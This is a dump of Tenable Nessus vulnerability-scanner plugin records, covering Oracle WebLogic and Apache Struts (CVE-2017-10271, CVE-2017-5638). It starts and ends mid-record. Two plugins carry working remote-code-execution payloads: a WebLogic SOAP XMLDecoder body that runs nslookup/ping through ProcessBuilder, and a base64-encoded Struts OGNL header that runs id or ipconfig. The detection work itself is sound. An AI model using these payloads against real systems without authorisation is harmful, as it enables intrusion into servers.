item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:08:36", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:06:06", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-29T14:52:23", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-07-17T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:14:06", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/99528", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99528);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1181\",\n \"CVE-2017-3506\",\n \"CVE-2017-3531\",\n \"CVE-2017-5638\"\n );\n script_bugtraq_id(\n 91068,\n 91787,\n 96729,\n 97884\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"TRA\", value:\"TRA-2017-16\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n Apache Struts component due to improper handling of\n multithreaded access to an ActionForm instance. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted multipart request, to execute\n arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services\n subcomponent that allows an unauthenticated, remote\n attacker to modify or delete arbitrary data accessible\n to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web\n Container subcomponent due to improper handling of\n reflected PartItem File requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2228898.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2017-16\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-16-444/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170418\";\n fix = \"25388747\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170418\";\n fix = \"25388793\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.0($|[^0-9])\")\n{\n fix_ver = \"12.2.1.0.170418\";\n fix = \"25388847\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170418\";\n fix = \"25388843\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170418\";\n fix = \"25388866\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n report =\n '\\n 